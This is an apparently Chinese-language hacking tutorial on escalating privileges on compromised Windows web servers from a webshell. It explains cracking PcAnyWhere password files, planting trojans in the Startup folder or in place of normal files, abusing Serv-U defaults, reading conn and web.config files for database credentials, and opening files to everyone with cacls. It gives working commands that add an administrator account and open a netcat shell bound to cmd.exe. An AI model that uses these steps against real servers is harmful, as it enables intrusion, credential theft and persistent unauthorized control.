PcAnyWhere提权、添加启动菜单 、替换服务 、Serv-U提权 、Conn文件的读取 、cacls 提权．文件权限配置不当提权

2、PcAnyWhere提权

2.1 什么是PcAnyWhere？

       远程控制软件，你可以将你的电脑当成主控端去控制远方另一台同样安装有PcAnyWhere的电脑(被控端)．

2.2如何利用？

      PcAnyWhere连接有单独的用户名，而这些用户名都存放在安装路径下的CIF文件里，默认安装路径为C:\Documents and Settings\All Users\Application Data\Symantec\PcAnyWhere

获得被控端的PcAnyWhere密码

工具：pcanywherepwd

导入下载得到的cif文件，点击crack，获得被控端明文的用户名和密码

3、启动项添加文件

启动项：当服务器启动系统的时候，会自动加载启动项里面的内容

路径：C:\Documents and Settings\All Users\「开始」菜单\程序\启动

利用：黑客可以利用webshell，将特定的vbs,bat以及远控木马写入此处，这

样，当管理员启动机器的时候，这些预先设置的程序就被自动运行了。

示例：写入bat批处理文件

Bat内容：

4、替换服务

       利用特制的木马替换掉正常的文件

这是一种带有欺骗性的提权方法，黑客在本地制作一个假的木马文件．

然后替换掉服务器上正常的文件，服务器管理员通常会运行我们制定好的木马文件．

欺骗文件演示

  如果服务器管理员桌面上本来有这么个东西，而我把它删掉，再上传我这个伪装了的木马程序，那么，管理员通常情况下是会运行我们木马的。

5、Serv_U提权

界面

ASP版SU提权,直接执行系统命令

5Webshell中使用SU提权

通过默认的SU用户名和密码，执行系统命令

6、Conn文件的读取

6.1、Conn数据库连接文件

通常情况下，ASP,PHP程序员会把连接数据库语句写入到命令为conn的页面内.而ASP.NET程序员则把数据库连接信息写在web.config里.于是,恶意用户通过WEBSHELL读取这些页面的可用信息.突破权限.

6.2、ASP.NET中读取web.config

黑客通过WEBSHELL读取了站点上web.config数据库连接文件,如图得到SA权限

7、Cacls提权

7.1、Cacls介绍

显示或修改任意访问控制列表 (DACL) 文件,是系统自带的功能

7.2、Cacls使用方法

        授予此用户对该目录的完全控制权限cacls d:\wwwroot /g everyone:f /e /t

取消其他用户对该目录的访问权限cacls d:\wwwroot /r everyone /e /t

8、文件权限配置不当提权

8.1普通提权

        直接执行开启3389端口、可以执行net user username password /add；net localgroup administrators username /add，如果cmd被禁用，可尝试自己上传cmd.exe

8.2NC反弹提权

      条件是你要有足够的运行权限然后把它反弹到自己的电脑上，找个可读可写的目录将nc.exe和cmd.exe上传上去。然后到cmd命令执行那栏里把cmd路径写上去，接着执行：C:\Inetpub\wwwroot\nc.exe -l -p 8888 -t -e C:\Inetpub\wwwroot\cmd.exe

执行完毕后打开我们的dos,执行：telnet 服务器IP 8888

说明：8888是我们监听的端口。接着tenter进入，这时就可以执行命令添加系统账号进行终端登陆了，完毕。

注(如果在webshell中执行的命令不是管理权限，可以将执行的命令包含下pr中)